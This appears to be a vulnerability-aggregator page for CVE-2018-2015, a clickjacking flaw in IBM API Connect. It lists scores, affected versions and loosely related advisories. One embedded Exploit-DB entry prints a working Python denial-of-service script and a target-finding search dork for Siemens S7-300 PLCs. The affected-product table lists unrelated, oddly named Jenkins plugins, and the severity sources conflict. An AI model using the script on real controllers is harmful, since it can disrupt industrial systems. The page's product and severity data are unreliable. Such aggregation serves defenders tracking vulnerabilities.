CVE-2018-2015
published 2019-05-02CVE-2018-2015: IBM API Connect 2018.1 and 2018.4.1.4 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious…
PriorityP428medium6.1CVSS 3.0
AVNACLPRNUIRSCCLILAN
EPSS
1.59%
72.9th percentile
IBM API Connect 2018.1 and 2018.4.1.4 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 155195.
Affected
22 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | api_connect | — | — |
| ibm | api_connect | — | — |
| ibm | api_connect | 2018.1.0 – 2018.4.1.4 | — |
| jenkins | azure_slave_plugin | — | — |
| jenkins | azure_vm_agents_plugin | — | — |
| jenkins | coverity_plugin | — | — |
| jenkins | cppncss_plugin | — | — |
| jenkins | credentials_plugin | — | — |
| jenkins | envinject_plugin | — | — |
| jenkins | environment_injector_plugin | — | — |
| jenkins | gerrit_trigger_plugin | — | — |
| jenkins | git_plugin | — | — |
| jenkins | google_play_android_publisher_plugin | — | — |
| jenkins | ids_in_google_play_android_publisher_plugin | — | — |
| jenkins | improper_access_control_in_gerrit_trigger_plugin | — | — |
| jenkins | job_and_node_ownership_plugin | — | — |
| jenkins | mercurial_plugin | — | — |
| jenkins | testlink_plugin | — | — |
| jenkins | url_in_git_plugin | — | — |
| jenkins | url_in_mercurial_plugin | — | — |
| jenkins | url_in_subversion_plugin | — | — |
| jenkins | you_have_ever_used_environment_injector_plugin | — | — |
CVSS provenance
nvdv3.06.1MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
ghsa9.8CRITICAL
osv3.5LOW
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cg4w-8xg5-98hg: IBM API Connect 2018
ghsa_unreviewed·2022-05-24
CVE-2018-2015 [MEDIUM] CWE-20 GHSA-cg4w-8xg5-98hg: IBM API Connect 2018
IBM API Connect 2018.1 and 2018.4.1.4 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 155195.
GHSA
Apache NiFi JMS Deserialization issue
ghsa·2022-05-14·CVSS 9.8
CVE-2018-1310 [CRITICAL] CWE-502 Apache NiFi JMS Deserialization issue
Apache NiFi JMS Deserialization issue
Apache NiFi JMS Deserialization issue because of ActiveMQ client vulnerability. Malicious JMS content could cause denial of service. See ActiveMQ CVE-2015-5254 announcement for more information. The fix to upgrade the activemq-client library to 5.15.3 was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.
OSV
drupal7 vulnerabilities
osv·2021-03-15·CVSS 3.5
CVE-2018-7600 drupal7 vulnerabilities
drupal7 vulnerabilities
It was discovered that Drupal did not properly process certain input. An
attacker could use this vulnerability to execute arbitrary code or
completely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)
It was discovered that password reset URLs in Drupal could be forged. An
attacker could use this vulnerability to gain access to another user's
account. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)
It was discovered that Drupal did not properly protect against open
redirects. An attacker could use this vulnerability to send unsuspecting
users to 3rd party sites and potentially carry out phishing attacks.
This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)
Palo Alto
PAN-SA-2024-0008 Informational Bulletin: Impact of OSS CVEs in PAN-OS
vendor_paloalto·2024-09-04·CVSS 6.0
CVE-2022-22965 [MEDIUM] PAN-SA-2024-0008 Informational Bulletin: Impact of OSS CVEs in PAN-OS
PAN-SA-2024-0008 Informational Bulletin: Impact of OSS CVEs in PAN-OS
The Palo Alto Networks Product Security Assurance team has evaluated the following open source software (OSS) CVEs as they relate to PAN-OS software. While PAN-OS software may include the
CVEs: CVE-2010-1622, CVE-2015-7552, CVE-2018-16840, CVE-2019-7639, CVE-2020-17049, CVE-2020-7774, CVE-2021-0131, CVE-2021-0132, CVE-2021-0133, CVE-2021-0134, CVE-2021-4044, CVE-2021-4160, CVE-2021-41773, CVE-2022-1343, CVE-2022-21449, CVE-2022-2274, CVE-2022-22963, CVE-2022-22965, CVE-2022-24697, CVE-2022-32207, CVE-2022-3358, CVE-2022-3996, CVE-2022-40664, CVE-2022-44792, CVE-2022-44793, CVE-2023-1255, CVE-2023-22809, CVE-2023-23919, CVE-2023-3341, CVE-2023-4236, CVE-2023-4863, CVE-2023-51767
Affected products: PAN-OS
No detection rules found.
Exploit-DB
Siemens SIMATIC S7-300 CPU - Remote Denial of Service
exploitdb·2018-05-30·CVSS 7.8
CVE-2015-2177 [HIGH] Siemens SIMATIC S7-300 CPU - Remote Denial of Service
Siemens SIMATIC S7-300 CPU - Remote Denial of Service
---
# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-30
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-300 CPU family: all versions.
# Tested on: Kali Linux
# CVE: CVE-2015-2177
#!/usr/bin/python
import socket
target_address="TargetIP"
target_port=80
buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
Exploit-DB
Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
exploitdb·2018-05-21
Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
---
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-21
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015- 5698
# 1. Proof of Concept
Bugzilla
CVE-2018-3214 OpenJDK: Infinite loop in RIFF format reader (Sound, 8205361)
bugzilla·2018-10-15·CVSS 5.3
CVE-2018-3214 [MEDIUM] CVE-2018-3214 OpenJDK: Infinite loop in RIFF format reader (Sound, 8205361)
CVE-2018-3214 OpenJDK: Infinite loop in RIFF format reader (Sound, 8205361)
An infinite loop flaw was found in the RIFF (Resource Interchange File Format) file format reader in the Sound component of OpenJDK. A specially crafted RIFF file could cause a Java application to enter an infinite loop while reading the RIFF file.
Discussion:
This issue was originally reported and fixed in 2015:
https://bugs.openjdk.java.net/browse/JDK-8135160
http://hg.openjdk.java.net/jdk9/jdk9/jdk/rev/420dd4208444
but it only got fixed in OpenJDK 9 and not backported to earlier versions at the time.
The problem was re-discovered again when fuzzing Apache Tika:
https://www.modzero.ch/modlog/archives/2018/09/20/java_bugs_with_and_without_fuzzing/index.html
---
Public now via Oracle CPU October 2018:
htt
Bugzilla
CVE-2018-18065 net-snmp: NULL pointer exception in _set_key in agent/helpers/table_container.c resulting in a denial of service
bugzilla·2018-10-09·CVSS 7.5
CVE-2018-18065 [HIGH] CVE-2018-18065 net-snmp: NULL pointer exception in _set_key in agent/helpers/table_container.c resulting in a denial of service
CVE-2018-18065 net-snmp: NULL pointer exception in _set_key in agent/helpers/table_container.c resulting in a denial of service
It was found that _set_key in agent/helpers/table_container.c in Net-SNMP before 5.8 has a NULL Pointer Exception bug that can be used by an authenticated attacker to remotely cause the instance to crash via a crafted UDP packet, resulting in Denial of Service.
References:
https://dumpco.re/blog/net-snmp-5.7.3-remote-dos
Upstream patch:
https://sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d/
Discussion:
Created net-snmp tracking bugs for this issue:
Affects: fedora-all [bug 1637573]
---
Unable to reproduce on any version of RHEL using instructions. This appears to be a duplicate of CVE-2015-5621. See the reference page for th
Bugzilla
CVE-2018-14567 libxml2: Infinite loop caused by incorrect error detection during LZMA decompression
bugzilla·2018-08-22·CVSS 2.6
CVE-2018-14567 [LOW] CVE-2018-14567 libxml2: Infinite loop caused by incorrect error detection during LZMA decompression
CVE-2018-14567 libxml2: Infinite loop caused by incorrect error detection during LZMA decompression
libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251.
Upstream Patch:
https://gitlab.gnome.org/GNOME/libxml2/commit/2240fbf5912054af025fb6e01e26375100275e74
Discussion:
Created libxml2 tracking bugs for this issue:
Affects: fedora-all [bug 1619878]
Created mingw-libxml2 tracking bugs for this issue:
Affects: epel-7 [bug 1619880]
Affects: fedora-all [bug 1619879]
---
RHEL5/6 use a libxml2 version released before it had LZMA support.
---
Statement:
Red Hat Product Security has r
Bugzilla
CVE-2018-10908 vdsm: calls to qemu-img are not protected by prlimit/ulimit
bugzilla·2018-07-20·CVSS 7.5
CVE-2018-10908 [HIGH] CVE-2018-10908 vdsm: calls to qemu-img are not protected by prlimit/ulimit
CVE-2018-10908 vdsm: calls to qemu-img are not protected by prlimit/ulimit
A vulnerability was found in ovirt, allowing a user to consume large amounts of memory or CPU time on the host by uploading a maliciously crafted image. This could lead to denial of service on the host, potentially impacting other users.
Discussion:
See also CVE-2015-5162, essentially the same issue on Openstack.
---
Discussion:
http://lists.nongnu.org/archive/html/qemu-block/2018-07/msg00488.html
---
Statement:
Red Hat Enterprise Virtualization 3 is now in Extended Life Phase of the support and maintenance lifecycle. Red Hat Product Security has rated this issue as having a security impact of Moderate, and it is not currently planned to be addressed in future updates of Red Hat Virtualization 3. For additi
http://www.securityfocus.com/bid/108153https://exchange.xforce.ibmcloud.com/vulnerabilities/155195https://www.ibm.com/support/docview.wss?uid=ibm10882756http://www.securityfocus.com/bid/108153https://exchange.xforce.ibmcloud.com/vulnerabilities/155195https://www.ibm.com/support/docview.wss?uid=ibm10882756
2019-05-02
Published